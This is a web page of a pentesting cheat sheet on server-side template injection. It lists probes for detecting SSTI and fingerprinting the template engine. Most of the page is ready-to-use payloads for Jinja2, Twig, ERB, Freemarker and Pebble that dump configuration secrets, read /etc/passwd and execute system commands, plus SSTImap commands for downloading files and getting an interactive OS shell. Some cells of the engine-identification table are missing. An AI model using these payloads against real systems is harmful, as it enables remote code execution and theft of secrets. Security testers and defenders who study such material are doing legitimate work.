SSTI

PayloadsAllTheThings SSTI | SSTI Payloads

Confirm SSTI

Break Template Syntax

${{<%[%'"}}%\.

If this causes a server error, SSTI is likely.

Basic Math Test

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}

If 49 appears, template is executing code.

Identify Template Engine

Payload

Result

Engine

${7*7}

Freemarker, Thymeleaf, etc.

{{7*7}}

Jinja2, Twig, etc.

{{7*'7'}}

7777777

Jinja2

{{7*'7'}}

Twig

<%= 7*7 %>

ERB (Ruby)

#{7*7}

Pebble, Thymeleaf

Jinja2 (Python/Flask)

Information Disclosure

# Dump config (includes secret keys)
{{ config.items() }}

# Dump builtins
{{ self.__init__.__globals__.__builtins__ }}

Local File Read

{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

RCE

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Alternative Paths to RCE

# Via request object
{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}

# Via config object
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("whoami").read() }}

# Via import_string
{{ config.__class__.from_envvar.__globals__.import_string("os").popen("id").read() }}

Twig (PHP/Symfony)

Information Disclosure

{{ _self }}

Local File Read (Symfony only)

{{ "/etc/passwd"|file_excerpt(1,-1) }}

RCE

{{ ['id'] | filter('system') }}
{{ ['cat /etc/passwd'] | filter('system') }}
{{ ['whoami'] | map('system') }}

SSTImap (Automated Tool)

# Install
git clone https://github.com/vladko312/SSTImap
cd SSTImap
pip3 install -r requirements.txt

# Auto-detect SSTI
python3 sstimap.py -u "http://TARGET/page?name=test"

# Download file
python3 sstimap.py -u "http://TARGET/page?name=test" -D '/etc/passwd' './passwd'

# Execute command
python3 sstimap.py -u "http://TARGET/page?name=test" -S id

# Interactive shell
python3 sstimap.py -u "http://TARGET/page?name=test" --os-shell

Other Engines Quick Reference

ERB (Ruby)

<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').readlines() %>

Freemarker (Java)

<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}

Pebble (Java)

{% set cmd = 'id' %}
{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd).inputStream.readAllBytes() %}
{{ (1).TYPE.forName('java.lang.String').constructors[0].newInstance(([bytes]).toArray()) }}

Resources

HackTricks SSTI

PreviousSSRF NextSSI & XSLT Injection

Last updated 25 days ago

hashtagConfirm SSTI

hashtagBreak Template Syntax

hashtagBasic Math Test

hashtagIdentify Template Engine

hashtagJinja2 (Python/Flask)

hashtagInformation Disclosure

hashtagLocal File Read

hashtagRCE

hashtagAlternative Paths to RCE

hashtagTwig (PHP/Symfony)

hashtagInformation Disclosure

hashtagLocal File Read (Symfony only)

hashtagRCE

hashtagSSTImap (Automated Tool)

hashtagOther Engines Quick Reference

hashtagERB (Ruby)

hashtagFreemarker (Java)

hashtagPebble (Java)

hashtagResources

Confirm SSTI

Break Template Syntax

Basic Math Test

Identify Template Engine

Jinja2 (Python/Flask)

Information Disclosure

Local File Read

RCE

Alternative Paths to RCE

Twig (PHP/Symfony)

Information Disclosure

Local File Read (Symfony only)

RCE

SSTImap (Automated Tool)

Other Engines Quick Reference

ERB (Ruby)

Freemarker (Java)

Pebble (Java)

Resources